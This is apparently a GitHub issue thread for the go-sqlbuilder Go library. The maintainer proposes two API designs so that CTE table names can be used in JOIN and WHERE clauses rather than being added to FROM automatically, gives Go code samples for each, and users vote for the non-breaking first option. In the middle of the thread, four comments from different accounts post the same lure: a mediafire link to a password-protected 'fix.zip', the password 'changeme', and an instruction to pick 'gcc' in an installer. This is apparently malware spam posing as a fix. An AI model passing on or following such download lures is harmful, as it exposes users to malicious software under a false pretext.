### ISSUE TITLE
Design Discussion: How to use CTE table name in JOIN and WHERE clause

### ISSUE THREAD

**Issue by huandu** [huandu/go-sqlbuilder#163]
In current design, if we call `With()` method on `SelectBuilder`, CTE table names will be automatically added to the `FROM` clause in `SELECT` statement. This behavior is not expected sometimes if we want to use CTE table in `JOIN` or `WHERE` clause, not in `FROM`. However, there is no way to change this behavior. We need to design new API or do some break changes to fix it.

Based on comments [1](https://github.com/huandu/go-sqlbuilder/issues/161#issuecomment-2302064944) and [2](https://github.com/huandu/go-sqlbuilder/issues/161#issuecomment-2304428895) by @arikkfir in #161, I create this issue to discuss how to solve this issue. **Feel free to join this discussion and share your thoughts.**

I have two possible solutions. My personal preference is the solution 1.

### Solution 1: Keep `CTETable()` as it is, and add new method `CTEQuery()` to build CTE query without any side effect

`CTETableBuilder` will be renamed to `CTEQueryBuilder`, which is just designed to build CTE query without any side effect, e.g. adding its name in `FROM` clause. To preserve current behavior, `CTETable()` will return `*CTEQueryBuilder` with a flag indicating `CTEBuilder` to add this CTE query name to `FROM` clause.

Ideally, this change will not break any existing API, as the struct `CTETableBuilder` is not expected to be used directly by any user. To ensure backward compatibility, I'll add a type alias `type CTETableBuilder = CTEQueryBuilder`.

Following is a sample using this new API.

```go
b := With(
    // CTEQuery will NOT be added to FROM clause automatically.
    CTEQuery("f").As(
        Select("id", "a").From("foo"),
    ),

    // CTETable will be added to FROM clause automatically.
    // We can read CTETable as "CTE query to be used as a table".
    CTETable("b").As(
        Select("b").From("bar"),
    ),
).Select("t.id", "f.a", "b.b").From("t").Join(
    "f", "f.id = t.id",
)
println(b.String())

// Output:
// WITH f AS (SELECT id, a FROM foo), b AS (SELECT b FROM bar) SELECT t.id, f.a, b.b FROM t, b JOIN f ON f.id = t.id
```

My initial design, adding CTE table names to `FROM` clause automatically, is to improve readability of related Go code.

From the sample code below, we can see that using this design makes the writing of Go code very similar to the writing of SQL itself, which should enhance the readability and maintainability of the code.

https://github.com/huandu/go-sqlbuilder/blob/8cd72cedc5179cdcb1645a5dfc9aee26a0d1ecb3/cte_test.go#L13-L31

### Solution 2: BREAKING CHANGE - Explicitly set table names in `SelectBuilder.With()` method to add CTE table in `FROM` clause

Another way to solve this issue is to completely remove the side effect, with which all CTE table names will be automatically added to `FROM` clause. Instead, adding second param `names` in `SelectBuilder.With(builder *CTEBuilder, names ...string)` to allow us to add CTE table names to `FROM` clause explicitly.

Here is a sample.

```go
cteb := With(
    CTETable("f").As(
        Select("id", "a").From("foo"),
    ),
    CTETable("b").As(
        Select("b").From("bar"),
    ),
)
sb := Select("t.id", "f.a", "b.b").From("t").Join(
    "f", "f.id = t.id",
).With(cteb, "b") // Explicitly add `b` in `FROM` clause
println(sb.String())

// Output:
// WITH f AS (SELECT id, a FROM foo), b AS (SELECT b FROM bar) SELECT t.id, f.a, b.b FROM t, b JOIN f ON f.id = t.id
```

---

There could be other solutions to solve this issue. Looking forward to any feedback on this topic.

cc @slok @iambudi, because of your previous contribution on CTE.

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by arikkfir** [comment]
👍 for solution 1 from me too

**Comment by iambudi** [comment]
I choose solution #1, no breaking changes and "makes the writing of Go code very similar to the writing of SQL itself".

**Comment by huandu** [comment]
Thanks all for your feedback. I'll implement the solution 1 by this weekend.
